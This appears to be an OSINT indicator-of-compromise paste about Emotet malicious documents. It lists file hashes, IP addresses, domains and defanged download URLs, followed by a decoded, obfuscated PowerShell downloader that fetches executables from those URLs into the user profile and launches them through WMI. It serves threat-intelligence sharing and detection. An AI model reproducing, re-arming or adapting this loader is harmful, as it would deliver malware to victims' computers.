Emotet_Doc_out_2020-02-10_14_46.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 37df1c897498e12038bca3c4ae4d02776ab77d84a6e33bac3593b15667f858b4
5. b1d7b40258d9992759f67e3bd54fbb74a2f49734944fd6552c8fb10dcd967adb
6. 6fc4a92196feef5bda8bdb05e2b5b05eb2c48450f60012863701e05f4aa73d03
7. 5784596ff2c505653b8224d4e05914e5ec6d6844b3504268fdf152e6599e8331
8. 48623cdba9af101991ee00bc2ff9ca3a5f83e5c70df0c7a7de313f41588f6349
9. 58e6e19cb9159d73ba06ee2f9c774a5cf85a7f121452209a1d81f01ccc0deff4
10. bf467bc7b27db7f31f5130fa89c4b97d9ab7c4e87e4d8e1c2b9398e0f8337983
11. c72f6dd3870ea0daab032035a6a75457049d61271108aed09b813e0a61951f63
12. 00f8f8d56720bada858c0e24c0c8c5c3bb3c360a941557055763513ddc728c9a
13. 06b64e2e53c08beba1406ecb836952a5dd862fd465f5c7ff102f4f950d5430f8
14. 97871c5963b97b79ce2d971be6184c2061ee2581980e067e3dee631dff7f7470
15. fdb9005001ddb9dcaffdb590dd9fab7761288adcc49b6d78d9cf3d444281e7da
16.  
17.  
18. IPs:
19. 104.20.106.5
20. 104.20.107.5
21. 123.31.31.47
22. 162.213.248.207
23. 185.165.116.18
24. 185.72.146.155
25. 188.253.2.205
26. 205.144.171.80
27. 3.86.33.96
28. 51.255.215.166
29. 54.208.104.124
30.  
31. Domains:
32. blog.prodigallovers.com
33. gatelen-002-site1.htempurl.com
34. khoshrougallery.com
35. kobo.nhanhwebvn.com
36. legal.dailynotebook.org
37. ourproductreview.in
38. ta-behesht.ir
39. tatcogroup.ir
40. tcpartner.ru
41. tepcian.utcc.ac.th
42.  
43.  
44. hxxp://ta-behesht.ir/images/Provx00a/
45. hxxp://tatcogroup.ir/wp-admin/UC/
46. hxxp://tcpartner.ru/wp-includes/nr8/
47. hxxp://tepcian.utcc.ac.th/wp-admin/SquR/
48. hxxp://ourproductreview.in/pokjbg746ihrtr/a1kzwc/
49. hxxp://kobo.nhanhwebvn.com/wp-admin/Cy4bJWG2PW/
50. hxxp://khoshrougallery.com/cgi-bin/fINL/
51. hxxp://legal.dailynotebook.org/wp-includes/K3601365/
52. hxxp://gatelen-002-site1.htempurl.com/6jfdf/yLv61/
53. hxxp://blog.prodigallovers.com/wp-content/SO10/
54.  
55.  
56. Decoded Base64 Powershell:
57. $Evizklrl='Zpxlmpjesfu';
58. $Nazcyjtbtbhwj = '879';
59. $Pjigzgyiukxvz='Lvpbpzuwqhly';
60. $Djaaouswnbrhy=$env:userprofile+'\'+$Nazcyjtbtbhwj+'.exe';
61. $Wihijkbdllr='Vmnqqkmhkfvx';
62. $Kqvfoxypez=&('new'+'-ob'+'ject') nEt.WebcLIENT;
63. $Algyovsmnirll='hxxp://ta-behesht.ir/images/Provx00a/
64. hxxp://tatcogroup.ir/wp-admin/UC/
65. hxxp://tcpartner.ru/wp-includes/nr8/
66. hxxp://tepcian.utcc.ac.th/wp-admin/SquR/
67. hxxp://ourproductreview.in/pokjbg746ihrtr/a1kzwc/'."sP`lIT"([char]42);
68. $Mrynihqxcqnp='Hkdkzhzkcrv';
69. foreach($Xhipsvwp in $Algyovsmnirll){try{$Kqvfoxypez."dOwnL`O`ADFIle"($Xhipsvwp, $Djaaouswnbrhy);
70. $Jmclkjqp='Xiiaxkwcaw';
71. If ((.('Get'+'-I'+'tem') $Djaaouswnbrhy)."Le`NgTh" -ge 37432) {([wmiclass]'win32_Process')."CRE`ATe"($Djaaouswnbrhy);
72. $Ckxsucohstchl='Cgxavxfbr';
73. break;
74. $Zgovrhjm='Mqvnxffo'}}catch{}}$Mlrztzvecwjg='Ciswcvxyzeqq'$Yyevdkfpmaiyt='Rsszsmutgtx';
75. $Kezdhvwbpxqcj = '228';
76. $Nvpwfxcoj='Fpndzwcmzf';
77. $Ddxyzcwasf=$env:userprofile+'\'+$Kezdhvwbpxqcj+'.exe';
78. $Jlkeexbgfj='Ftcorndigmmxg';
79. $Botrnfhnigg=.('new-o'+'b'+'je'+'ct') nET.weBCLIENt;
80. $Wtkwsqtpxgyv='hxxp://kobo.nhanhwebvn.com/wp-admin/Cy4bJWG2PW/
81. hxxp://khoshrougallery.com/cgi-bin/fINL/
82. hxxp://legal.dailynotebook.org/wp-includes/K3601365/
83. hxxp://gatelen-002-site1.htempurl.com/6jfdf/yLv61/
84. hxxp://blog.prodigallovers.com/wp-content/SO10/'."s`plit"([char]42);
85. $Xutwapkfk='Xqhfhwgnxguo';
86. foreach($Kxgxcruxoot in $Wtkwsqtpxgyv){try{$Botrnfhnigg."dO`w`NLoad`FIlE"($Kxgxcruxoot, $Ddxyzcwasf);
87. $Codwynxope='Mhkunrtyqn';
88. If ((&('Ge'+'t'+'-Item') $Ddxyzcwasf)."l`EnGth" -ge 21090) {([wmiclass]'win32_Process')."c`Re`ATE"($Ddxyzcwasf);
89. $Qqssbcgyk='Hilhviac';
90. break;
91. $Jzdcsduwwonbs='Evocfncijnefm'}}catch{}}$Myhjgropi='Bnjnfqdkqm'